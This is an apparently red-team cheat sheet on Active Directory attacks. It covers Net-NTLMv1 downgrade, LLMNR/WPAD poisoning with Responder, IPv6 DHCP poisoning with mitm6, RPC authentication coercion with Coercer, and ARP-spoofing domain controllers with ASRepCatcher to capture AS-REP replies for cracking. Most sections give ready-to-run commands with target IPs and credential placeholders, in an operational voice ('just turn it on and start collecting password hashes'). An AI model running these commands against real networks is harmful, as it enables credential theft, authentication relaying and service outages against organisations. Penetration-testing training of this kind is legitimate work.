Protocol Poisoning and Coercion
Net-NTLMv1
An important caveat to the following attacks is the limitations of Net-NTLM. Net-NTLMv2 is not so easily cracked but can be used for relaying in most scenarios. However, Net-NTLMv1 authentication is vulnerable to a downgrade attack through DES decryption. Net-NTLMv1 may be downgraded directly into NTLM and then passed as credentials for Kerberos tickets or service authentication.
Protocol Poisoning
"Protocol poisoning" is a general term used to describe the manipulation of authentication protocols in a malicious way. The vast majority of these methods work to redirect network-adjacent traffic towards an attacker controlled host, whereby the authentication will be intercepted or relayed further.
LLMNR and WPAD are commonly enabled protocols in Active Directory environments, both susceptible to protocol poisoning by various means. The tool responder does a lot of heavy lifting for these protocols - just turn it on and start collecting password hashes or relaying authentication.
Responder
responder -I eth0
responder -I eth0 -wF # Starts a WPAD response server and forces HTTP authenticationIPv6 DHCP is also commonly enabled in environments and lacks built-in security measures. Poisoning DHCP router requests allows you to redirect a large amount of traffic towards a controlled host. Be warned - excessive use may cause outages if IPv6 is in use throughout the organization.
IPv6 DHCP
mitm6 --ignore-fqdn -d contoso.com -i eth0Authentication Coercion
Authentication does not have to be intercepted - it may be coerced through a variety of means. SSRF and file upload path vulnerabilities may allow you to force HTTP-based authentication of Windows servers. Printer SMTP settings can be hijacked to reveal cleartext credentials. Get creative.
You may also use the RPC protocol to invoke functions on servers that force authentication attempts. The tool Coercer automates most of this process, allowing you to coerce either SMB or HTTP based authentication.
RPC Coercion - SMB/HTTP
Coercer scan -t 10.10.10.10 -u user -p pass -d contoso.comServers running the WebClient (WebDav) service allow you to coerce HTTP-based authentication outright. Make sure to include your NETBIOS name as the listener target, though.
Coercer coerce -t 10.10.10.10 -l \\WKSTN-1@80\ -u user -p pass -d contoso.comASREP ARP Relay
This technique involves ARP spoofing domain controllers to intercept ASREP reply messages when domain users authenticate. ASREP replies will be returned to your controlled host to be cracked offline.
ASRepCatcher relay -dc 192.168.1.100Last updated